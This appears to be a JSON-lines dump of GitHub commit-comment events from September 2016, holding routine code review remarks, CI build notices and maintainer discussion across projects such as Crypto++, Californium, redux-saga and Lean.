{"id":"4568734662","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":19038273,"position":14,"line":9,"path":"ui/saga.js","commit_id":"c8fefa87ba1acd6f56ff038cbcc3ad850cbe5e3c","created_at":"2016-09-15T15:14:48Z","updated_at":"2016-09-15T15:14:48Z","body":"Two comments here. One, you should never write the type as a string, you should always reference the variable from the `types.js` file:\r\n\r\n    import types from './types';\r\n\r\n    { type: types.LOAD_MOVIES, movies };\r\n\r\nAlthough, instead of constructing your action manually, you should be using your action creator:\r\n\r\n    yield put(actions.loadMovies(movies));"}},"created_at":"2016-09-15T15:14:48Z"}
{"id":"4568736054","type":"CommitCommentEvent","actor":{"login":"AgileFreaksBuildServer"},"repo":{"name":"Agilefreaks/todo"},"payload":{"comment":{"id":19038278,"position":null,"line":null,"path":null,"commit_id":"0a6bdc53477dd29eae9bca2bdf53afb0467d7b9a","created_at":"2016-09-15T15:15:02Z","updated_at":"2016-09-15T15:15:02Z","body":"TeamCity Todo :: Build [Build 103](http://109.103.226.38:8512/viewLog.html?buildId=38498&buildTypeId=Todo_Build) outcome was **SUCCESS**\nSummary: Tests passed: 20 Build time: 00:00:18"}},"created_at":"2016-09-15T15:15:02Z"}
{"id":"4568736138","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19038279,"position":null,"line":null,"path":null,"commit_id":"e1fa9b26a838a233949b55ca9672181edef6f289","created_at":"2016-09-15T15:15:02Z","updated_at":"2016-09-15T15:15:02Z","body":"The Cmake related files will no longer be distributed in the ZIP. The Cmake related files will be available in Master.\r\n\r\nThe could change in the future if someone steps up to maintain it. CMake has too many open issues, and neither UB and JW have the tim or expertise to maintain it.\r\n\r\n------\r\n\r\nHere's more of the back story... CMake does not build the library to our specs. We know the specs, but we don't know how to instruct CMake. Sometimes its easy to learn the CMake procedure, other times its not. For example, it was relatively pain free to instruct CMake to [stop hiding its output so we could see the build](http://github.com/weidai11/cryptopp/commit/9280850b2609153b60c072378acbbf4ccc75b359). The same cannot be said about instructing CMake to [use `CXXFLAGS` when linking](http://stackoverflow.com/q/39497813/608639).\r\n\r\nWhen JW runs into issues, he emails the three folks who wanted CMake and supplied the initial patches. The CMake folks no longer respond to emails. Additionally, Stack Overflow is not producing the desired level of support from those who know the tool. CMake is mostly unsupported now.\r\n\r\nRecently, we discovered CMake does not build the library or test programs with symbols. Here's JW trying to debug an issue under Solaris with DBX. Its a nearly useless trace. We specifically instruct users to build with symbols, and we will not promote tools that can't comply with basic policies, and makes it difficult to do so.\r\n\r\n```\r\n(dbx) where\r\n=>[1] CryptoPP::Baseline_Multiply2(0x23e64d0, 0x240b6f0, 0x240b7b0, 0x240b7b0, 0xa, 0x23dcbc8), at 0x182fac7 \r\n  [2] CryptoPP::RecursiveMultiply(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0x1846067 \r\n  [3] CryptoPP::AsymmetricMultiply(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0x18473a0 \r\n  [4] CryptoPP::PositiveMultiply(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0x1855167 \r\n  [5] CryptoPP::Multiply(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0x18551da \r\n  [6] CryptoPP::Integer::Times(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0x18552c3 \r\n  [7] CryptoPP::StringToInteger<char>(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0x1862e12 \r\n  [8] CryptoPP::Integer::Integer(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0x184c9f5 \r\n  [9] ValidateBBS(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0x11b6dcb \r\n  [10] ValidateAll(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0x108bf07 \r\n  [11] Validate(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0xcdb7fe \r\n  [12] main(0x0, 0x0, 0x0, 0x0, 0x0, 0x0), at 0xca2e7a \r\n```\r\n\r\n\r\n"}},"created_at":"2016-09-15T15:15:02Z"}
{"id":"4568736596","type":"CommitCommentEvent","actor":{"login":"AjayIndana"},"repo":{"name":"saksdirect/PerformanceTestingResults"},"payload":{"comment":{"id":19038281,"position":null,"line":null,"path":null,"commit_id":"96b2ff94ecb61f694a2d51ca3c5bc33ad93a6bba","created_at":"2016-09-15T15:15:08Z","updated_at":"2016-09-15T15:15:08Z","body":"index html"}},"created_at":"2016-09-15T15:15:08Z"}
{"id":"4568736911","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19038282,"position":null,"line":null,"path":null,"commit_id":"a589d57cd91a7c39bf95a159df891437041e583e","created_at":"2016-09-15T15:15:09Z","updated_at":"2016-09-15T15:15:09Z","body":"os_2_0_develop (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a589d57cd91a7c39bf95a159df891437041e583e-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T15:15:09Z"}
{"id":"4568737782","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038286,"position":388,"line":360,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/UdpMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:15:19Z","updated_at":"2016-09-15T15:15:19Z","body":"Is this a bug fix ?"}},"created_at":"2016-09-15T15:15:19Z"}
{"id":"4568742741","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038303,"position":null,"line":null,"path":null,"commit_id":"0474f62e60672fa7e72bf9815e0b9aecc48f107b","created_at":"2016-09-15T15:16:06Z","updated_at":"2016-09-15T15:16:06Z","body":"Better separate UT's multiple test handling."}},"created_at":"2016-09-15T15:16:06Z"}
{"id":"4568747059","type":"CommitCommentEvent","actor":{"login":"isayme"},"repo":{"name":"aploium/zmirror"},"payload":{"comment":{"id":19038314,"position":null,"line":null,"path":null,"commit_id":"cc9691662a72afcdb8de1b68df8f20e54c4a3017","created_at":"2016-09-15T15:16:46Z","updated_at":"2016-09-15T15:16:46Z","body":"🍻 "}},"created_at":"2016-09-15T15:16:46Z"}
{"id":"4568751105","type":"CommitCommentEvent","actor":{"login":"brentvatne"},"repo":{"name":"react-native-community/react-native-svg"},"payload":{"comment":{"id":19038330,"position":15,"line":14,"path":"Example/package.json","commit_id":"3d4974942a46daa36d0a436cb2010aa158c4995e","created_at":"2016-09-15T15:17:24Z","updated_at":"2016-09-15T15:17:24Z","body":"oh sorry about that :( thinking about this again, I think you're right -- we should move them to separate packages because the rate of change will be different, eg: for the exponent version we'll only update every 2-3 weeks whereas you'll update native code and want to update the example at a pace that works for you. I'll split the exponent one out! :)"}},"created_at":"2016-09-15T15:17:24Z"}
{"id":"4568751362","type":"CommitCommentEvent","actor":{"login":"mateuszbuda"},"repo":{"name":"mateuszbuda/id2221"},"payload":{"comment":{"id":19038331,"position":10,"line":49,"path":"lab1/topten/src/sics/TopTen.java","commit_id":"99d13b3d76fe6d6525f5e316818fbc317fcc889c","created_at":"2016-09-15T15:17:26Z","updated_at":"2016-09-15T15:17:26Z","body":"hmm, but then in reduce you need reputation again and if you pass username only, there's no way you can gat it back.. or am I missing something?"}},"created_at":"2016-09-15T15:17:26Z"}
{"id":"4568751440","type":"CommitCommentEvent","actor":{"login":"rohit-batra"},"repo":{"name":"Microsoft/vsts-tasks"},"payload":{"comment":{"id":19038332,"position":115,"line":195,"path":"Tasks/SqlAzureDacpacDeployment/Utility.ps1","commit_id":"4cefaf18b6753d0408be6d97715ae86e404e6822","created_at":"2016-09-15T15:17:26Z","updated_at":"2016-09-15T15:17:26Z","body":"Tagging @mathieu-benoit which i forgot in previous reply. "}},"created_at":"2016-09-15T15:17:26Z"}
{"id":"4568753517","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038337,"position":11,"line":117,"path":"actl","commit_id":"bd56a03665fd1385a715552962cc92be932c1edf","created_at":"2016-09-15T15:17:45Z","updated_at":"2016-09-15T15:17:45Z","body":"`...max(w1, w2) for w1, w2 in...`"}},"created_at":"2016-09-15T15:17:45Z"}
{"id":"4568754980","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038344,"position":45,"line":45,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/InMemoryMessageIdProvider.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:17:58Z","updated_at":"2016-09-15T15:17:58Z","body":"What value do you propose? It doesn't seem unreasonable to me to expect to talk to 32k peers ..."}},"created_at":"2016-09-15T15:17:58Z"}
{"id":"4568762706","type":"CommitCommentEvent","actor":{"login":"IrcDirk"},"repo":{"name":"mikepauer/Carbonite"},"payload":{"comment":{"id":19038374,"position":349,"line":3013,"path":"Carbonite.Quests/NxQuest.lua","commit_id":"5c5002d75cc3e3bc5b134b68a6a8304a37d25217","created_at":"2016-09-15T15:19:11Z","updated_at":"2016-09-15T15:19:11Z","body":"U are asuming that every file wil load in 1s and then executes SortQuestDB after seconds multiplied by Quest.Load functions.\r\n\r\nWe should make it better by triggering SortQuestDB only after all Quest.Load files are parsed. Also at the end of SortQuestDB we sould add RecordQuestsLog. This function is missing and some features in Quest Module are missing."}},"created_at":"2016-09-15T15:19:11Z"}
{"id":"4568762801","type":"CommitCommentEvent","actor":{"login":"adolfo"},"repo":{"name":"aciidb0mb3r/SwiftMQTT"},"payload":{"comment":{"id":19038375,"position":28,"line":18,"path":"SwiftMQTT/SwiftMQTT/MQTTExtensions.swift","commit_id":"2852c00898072d9f74d1762b0b8d20b4c0e73ae2","created_at":"2016-09-15T15:19:12Z","updated_at":"2016-09-15T15:19:12Z","body":"connAck"}},"created_at":"2016-09-15T15:19:12Z"}
{"id":"4568763378","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038377,"position":64,"line":161,"path":"db.py","commit_id":"bd56a03665fd1385a715552962cc92be932c1edf","created_at":"2016-09-15T15:19:18Z","updated_at":"2016-09-15T15:19:18Z","body":"Missing call to `list_tasks()`."}},"created_at":"2016-09-15T15:19:18Z"}
{"id":"4568763545","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19038379,"position":10,"line":18,"path":"src/System.Security.Cryptography.Cng/src/System.Security.Cryptography.Cng.csproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T15:19:19Z","updated_at":"2016-09-15T15:19:19Z","body":"It is there... The diff just looks like the line is removed"}},"created_at":"2016-09-15T15:19:19Z"}
{"id":"4568767258","type":"CommitCommentEvent","actor":{"login":"sivajyothisaladi"},"repo":{"name":"sivajyothisaladi/Tutorial"},"payload":{"comment":{"id":19038390,"position":null,"line":null,"path":null,"commit_id":"01ad9157cf120fc61d472c0fd66a58ce36b4df94","created_at":"2016-09-15T15:19:52Z","updated_at":"2016-09-15T15:19:52Z","body":"code\r\n\r\n"}},"created_at":"2016-09-15T15:19:52Z"}
{"id":"4568768092","type":"CommitCommentEvent","actor":{"login":"adolfo"},"repo":{"name":"aciidb0mb3r/SwiftMQTT"},"payload":{"comment":{"id":19038394,"position":60,"line":40,"path":"SwiftMQTT/SwiftMQTT/MQTTExtensions.swift","commit_id":"2852c00898072d9f74d1762b0b8d20b4c0e73ae2","created_at":"2016-09-15T15:20:00Z","updated_at":"2016-09-15T15:20:00Z","body":"MQTTConnAckResponse"}},"created_at":"2016-09-15T15:20:00Z"}
{"id":"4568773796","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038411,"position":60,"line":60,"path":"server/app/configure/authentication/local.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:20:56Z","updated_at":"2016-09-15T15:20:56Z","body":"Maybe make sure this user does not already exist. HOWEVER, `unique: true` takes care of this for you, so never mind."}},"created_at":"2016-09-15T15:20:56Z"}
{"id":"4568774541","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038414,"position":11,"line":163,"path":"db.py","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-15T15:21:04Z","updated_at":"2016-09-15T15:21:04Z","body":"Needs verification!"}},"created_at":"2016-09-15T15:21:04Z"}
{"id":"4568774638","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":19038415,"position":null,"line":null,"path":null,"commit_id":"b3cdd00f1c9a36eb9b29c4db16361e3f7c01659f","created_at":"2016-09-15T15:21:05Z","updated_at":"2016-09-15T15:21:05Z","body":"See https://bugs.limesurvey.org/view.php?id=11657 @maziminke  : you can ask for some global class, the sooner we add, the better is (we must use for ALL {ANSWERS} view)."}},"created_at":"2016-09-15T15:21:05Z"}
{"id":"4568776478","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038423,"position":62,"line":62,"path":"server/app/configure/authentication/local.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:21:24Z","updated_at":"2016-09-15T15:21:24Z","body":"Passport yay"}},"created_at":"2016-09-15T15:21:24Z"}
{"id":"4568776485","type":"CommitCommentEvent","actor":{"login":"steveharter"},"repo":{"name":"steveharter/dotnet_corefx"},"payload":{"comment":{"id":19038424,"position":4,"line":6,"path":"src/System.Security.Cryptography.Primitives/pkg/System.Security.Cryptography.Primitives.pkgproj","commit_id":"a167b2feaacab5ad334666b56cc31311cdd9dd2a","created_at":"2016-09-15T15:21:24Z","updated_at":"2016-09-15T15:21:24Z","body":"I am prepping that project for other work that will update the version"}},"created_at":"2016-09-15T15:21:24Z"}
{"id":"4568781292","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038436,"position":552,"line":533,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/UdpMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:22:10Z","updated_at":"2016-09-15T15:22:10Z","body":"When observation will be identified by Token+correlationContext we will probably change this API"}},"created_at":"2016-09-15T15:22:10Z"}
{"id":"4568781647","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"zhewenw/react-starter"},"payload":{"comment":{"id":19038440,"position":28,"line":21,"path":"ui/saga.js","commit_id":"c8fefa87ba1acd6f56ff038cbcc3ad850cbe5e3c","created_at":"2016-09-15T15:22:12Z","updated_at":"2016-09-15T15:22:12Z","body":"Calling `yield` on a generator is not going to do what you want, you need to call `yield*`. Unfortunately, this syntax doesn't work because `takeEvery` is an infinite loop and `LOAD_DETAILS` will never be called:\r\n\r\n    export function* Saga() {\r\n      yield* takeEvery('LOAD_MOVIES', getMovies),\r\n      yield* takeEvery('LOAD_DETAILS', getDetails),\r\n    }\r\n\r\nInstead, you should use [`fork`](http://yelouafi.github.io/redux-saga/docs/api/index.html#forkfn-args) which is non-blocking:\r\n\r\n    function* onLoadMovies() {\r\n      yield* takeEvery('LOAD_MOVIES', getMovies),\r\n    }\r\n\r\n    function onLoadDetails() {\r\n      yield* takeEvery('LOAD_DETAILS', getDetails),\r\n    }\r\n\r\n    export function* saga() {\r\n      yield fork(onLoadMovies);\r\n      yield fork(onLoadDetails);\r\n    }"}},"created_at":"2016-09-15T15:22:12Z"}
{"id":"4568787517","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038456,"position":38,"line":38,"path":"crontab_job","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-15T15:23:06Z","updated_at":"2016-09-15T15:23:06Z","body":"Better specify package name."}},"created_at":"2016-09-15T15:23:06Z"}
{"id":"4568789658","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038461,"position":43,"line":43,"path":"crontab_job","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-15T15:23:27Z","updated_at":"2016-09-15T15:23:27Z","body":"Better specify package name."}},"created_at":"2016-09-15T15:23:27Z"}
{"id":"4568790570","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"akka/akka"},"payload":{"comment":{"id":19038468,"position":null,"line":null,"path":null,"commit_id":"400a7ee0c9fa44fde23835f9728a0ea57f119a36","created_at":"2016-09-15T15:23:34Z","updated_at":"2016-09-15T15:23:34Z","body":"I dont think this is needed, sorry for suggesting it. system.terminate will trigger the normal shutdown. The stop of the taskRunner here is just to stop spinning tasks as soon as poosible.\r\nWe should not block the aeron thread here."}},"created_at":"2016-09-15T15:23:34Z"}
{"id":"4568791445","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038471,"position":55,"line":73,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/deduplication/CropRotation.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:23:42Z","updated_at":"2016-09-15T15:23:42Z","body":"Same comment as BaseMatcher about threadsafeness."}},"created_at":"2016-09-15T15:23:42Z"}
{"id":"4568793482","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038483,"position":50,"line":50,"path":"crontab_job","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-15T15:24:00Z","updated_at":"2016-09-15T15:24:00Z","body":"Add `'secs...'`."}},"created_at":"2016-09-15T15:24:00Z"}
{"id":"4568793603","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038484,"position":388,"line":360,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/UdpMatcher.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:24:01Z","updated_at":"2016-09-15T15:24:01Z","body":"I consider it more of an optimization in that we do not need to do the lookup for each response (in particular not for responses received as an ACK which I think will be the most usual case)."}},"created_at":"2016-09-15T15:24:01Z"}
{"id":"4568793927","type":"CommitCommentEvent","actor":{"login":"sbernard31"},"repo":{"name":"eclipse/californium"},"payload":{"comment":{"id":19038487,"position":99,"line":88,"path":"californium-core/src/main/java/org/eclipse/californium/core/network/deduplication/SweepDeduplicator.java","commit_id":"49949b4ae4bfa8d041c405184a75b31ee859d1d9","created_at":"2016-09-15T15:24:05Z","updated_at":"2016-09-15T15:24:05Z","body":"Same comment as BaseMatcher about threadsafeness."}},"created_at":"2016-09-15T15:24:05Z"}
{"id":"4568804111","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038508,"position":43,"line":43,"path":"task_procs.py","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-15T15:25:41Z","updated_at":"2016-09-15T15:25:41Z","body":"Missing UT."}},"created_at":"2016-09-15T15:25:41Z"}
{"id":"4568805780","type":"CommitCommentEvent","actor":{"login":"ZHJUNJUN"},"repo":{"name":"ZHJUNJUN/ZHJUNJUN.github.io"},"payload":{"comment":{"id":19038513,"position":null,"line":null,"path":null,"commit_id":"ca99ace7b3b3e833ad086b5bc0c6507d3eed8afe","created_at":"2016-09-15T15:25:55Z","updated_at":"2016-09-15T15:25:55Z","body":"main.css"}},"created_at":"2016-09-15T15:25:55Z"}
{"id":"4568806267","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038516,"position":16,"line":16,"path":"server/db/models/order.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:26:00Z","updated_at":"2016-09-15T15:26:00Z","body":"Enums are good"}},"created_at":"2016-09-15T15:26:00Z"}
{"id":"4568808625","type":"CommitCommentEvent","actor":{"login":"fred3m"},"repo":{"name":"lsst/pipe_tasks"},"payload":{"comment":{"id":19038523,"position":18,"line":187,"path":"tests/testProcessCcd.py","commit_id":"093032395ae62bb8a3a5fb710b9c46631d221834","created_at":"2016-09-15T15:26:25Z","updated_at":"2016-09-15T15:26:25Z","body":"Is that you volunteering to review this when it is complete. 😄 "}},"created_at":"2016-09-15T15:26:25Z"}
{"id":"4568812208","type":"CommitCommentEvent","actor":{"login":"spwhitton"},"repo":{"name":"jbarlow83/OCRmyPDF"},"payload":{"comment":{"id":19038527,"position":null,"line":null,"path":null,"commit_id":"325cc0beca8f268744779f5aa5e17061626e440f","created_at":"2016-09-15T15:26:56Z","updated_at":"2016-09-15T15:26:56Z","body":"On Thu, Sep 01, 2016 at 04:30:11PM -0700, jbarlow83 wrote:\n> I experimented and it seems that py.test is designed to take care of this\n> automatically (provided a package has tests outside its package source tree, as\n> with ocrmypdf). If running via python3 setup.py test (to test the package\n> before installation) py.test inserts the uninstalled package into sys.path (I\n> think by way of a temporary installation). If run as py.test it will take the\n> system package because it changes PWD and runs each test in its directory.\n\nJust for the record, this isn't true for the py.test-3 binary in\nDebian.  It tries to use the source tree ocrmypdf/ if present.  I've\nworked around this for Debian CI like this:\n\n    mv ocrmypdf disabled\n    py.test-3 tests\n    mv disabled ocrmypdf\n\n-- \nSean Whitton\n"}},"created_at":"2016-09-15T15:26:56Z"}
{"id":"4568812303","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038528,"position":66,"line":171,"path":"actl_test","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-15T15:26:57Z","updated_at":"2016-09-15T15:26:57Z","body":"Rename to `test_cron_job_failure()`."}},"created_at":"2016-09-15T15:26:57Z"}
{"id":"4568814806","type":"CommitCommentEvent","actor":{"login":"avitalyahel"},"repo":{"name":"avitalyahel/autolite"},"payload":{"comment":{"id":19038538,"position":74,"line":179,"path":"actl_test","commit_id":"c0185dea1ce105f0e33552434f91b370dbaedc06","created_at":"2016-09-15T15:27:23Z","updated_at":"2016-09-15T15:27:23Z","body":"Missing test for job timeout."}},"created_at":"2016-09-15T15:27:23Z"}
{"id":"4568816559","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19038540,"position":null,"line":null,"path":null,"commit_id":"95be29e1c6b7a06ac444d5142582ebece79698ff","created_at":"2016-09-15T15:27:39Z","updated_at":"2016-09-15T15:27:39Z","body":"It's the same code."}},"created_at":"2016-09-15T15:27:39Z"}
{"id":"4568818679","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19038553,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-15T15:27:59Z","updated_at":"2016-09-15T15:27:59Z","body":"@LoneGazebo or @ilteroi \r\n\r\nIn regards to multiplayer checks is it better to use\r\n\r\n`if(GC.getGame().isReallyNetworkMultiPlayer())`\r\n\r\nor\r\n\r\n`if(CvPreGame::isNetworkMultiplayerGame())`\r\n\r\n?"}},"created_at":"2016-09-15T15:27:59Z"}
{"id":"4568821678","type":"CommitCommentEvent","actor":{"login":"leodemoura"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19038561,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T15:28:29Z","updated_at":"2016-09-15T15:28:29Z","body":"In `lean2`, we support \r\n```\r\nobtain ..., from ...,\r\n....\r\n```\r\nwithout the `for`. We still plan to support it in `lean3`. We try to avoid new `keywords`.\r\nThis notation looks fine when writing proofs, but it looks bizarre when writing programs.\r\nIn particular for (Haskell) programmers that are used to \r\n```\r\nlet (a, b, c) := p1 \r\nin a + b + c\r\n```\r\nBased on this thread, it seems we should keep the `let`-notation with patterns, and just add a note to the manual explaining why `zeta`-reduction is not supported for this kind of definition.\r\n"}},"created_at":"2016-09-15T15:28:29Z"}
{"id":"4568821890","type":"CommitCommentEvent","actor":{"login":"ThiagoHara"},"repo":{"name":"ThiagoHara/nodecms"},"payload":{"comment":{"id":19038564,"position":null,"line":null,"path":null,"commit_id":"fca9df5a7610a929c046f79aae81241434fc3c5b","created_at":"2016-09-15T15:28:30Z","updated_at":"2016-09-15T15:28:30Z","body":"Closes ThiagoHara/nodecms#76\r\n"}},"created_at":"2016-09-15T15:28:30Z"}
{"id":"4568825958","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038571,"position":32,"line":32,"path":"server/db/models/products.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:29:09Z","updated_at":"2016-09-15T15:29:09Z","body":"![bitmoji](https://render.bitstrips.com/v2/cpanel/8640348-122921288_15-s1-v1.png?transparent=1&width=246)"}},"created_at":"2016-09-15T15:29:09Z"}
{"id":"4568827690","type":"CommitCommentEvent","actor":{"login":"NewRoman"},"repo":{"name":"NewRoman/gfwhitelabels"},"payload":{"comment":{"id":19038577,"position":null,"line":null,"path":null,"commit_id":"a9e56d4a1a70fbac05699f15dad9b26d9bc11d2f","created_at":"2016-09-15T15:29:26Z","updated_at":"2016-09-15T15:29:26Z","body":"Not 1-2 items but 1-5 items done"}},"created_at":"2016-09-15T15:29:26Z"}
{"id":"4568830559","type":"CommitCommentEvent","actor":{"login":"glebec"},"repo":{"name":"yuyingliu331/fsg"},"payload":{"comment":{"id":19038586,"position":42,"line":42,"path":"server/db/models/products.js","commit_id":"a5fa5452131d50cb220a6985e37ed730358f2bd2","created_at":"2016-09-15T15:29:50Z","updated_at":"2016-09-15T15:29:50Z","body":"Nice."}},"created_at":"2016-09-15T15:29:50Z"}
{"id":"4568835436","type":"CommitCommentEvent","actor":{"login":"Nyks45"},"repo":{"name":"Nyks45/OctoDex-Kernel"},"payload":{"comment":{"id":19038604,"position":null,"line":null,"path":null,"commit_id":"ede71b53437defbd4fff62db0697827b4c33a3f0","created_at":"2016-09-15T15:30:38Z","updated_at":"2016-09-15T15:30:38Z","body":"@eoghan2t9 here this is all i can do  when u have no right to want credit\r\nnothing more"}},"created_at":"2016-09-15T15:30:38Z"}
{"id":"4568836072","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":19038606,"position":null,"line":null,"path":null,"commit_id":"b99e5c1f5f1c91b227b62ba1ba4384a4aea9cc36","created_at":"2016-09-15T15:30:43Z","updated_at":"2016-09-15T15:30:43Z","body":"it seems like they are mutually inclusive...but I'm wonder if isReallyNetworkMultiplayer by be a little more robust looking at code..."}},"created_at":"2016-09-15T15:30:43Z"}
{"id":"4568837123","type":"CommitCommentEvent","actor":{"login":"willshen"},"repo":{"name":"TheUpshot/prison-admissions"},"payload":{"comment":{"id":19038611,"position":null,"line":null,"path":null,"commit_id":"f95448240dafa279d2805c24d03ffa8554ba07c1","created_at":"2016-09-15T15:30:53Z","updated_at":"2016-09-15T15:30:53Z","body":"Thanks for the response Adam.\nDoes this impact the prison admission trend by county size chart at all? I\nnoticed that while the map is updated, the charts were not.\n\nAlso, does line graph consist of just two data points (06 and 13) for each\ncounty size? I noticed that your data set does not have any data for the in\nbetween, do you know how well they fit to the line?\n\nOn Thu, Sep 15, 2016 at 7:59 AM Adam Pearce <notifications@github.com>\nwrote:\n\n> Yes, we've updated the map and added a correction the article:\n>\n> An earlier version of a map with this article misstated the per capita\n> prison admissions numbers for New Mexico counties. Most counties overstated\n> the admission rate, while Otero and Luna Counties understated the rate. The\n> average admission rate in New Mexico is 18.23 per 10,000 people, not 20.09.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TheUpshot/prison-admissions/commit/f95448240dafa279d2805c24d03ffa8554ba07c1#commitcomment-19037969>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA_k24BjwVR2NDkRiS1R7ROQ4Wc4mDm0ks5qqV1cgaJpZM4J9ggf>\n> .\n>\n"}},"created_at":"2016-09-15T15:30:53Z"}
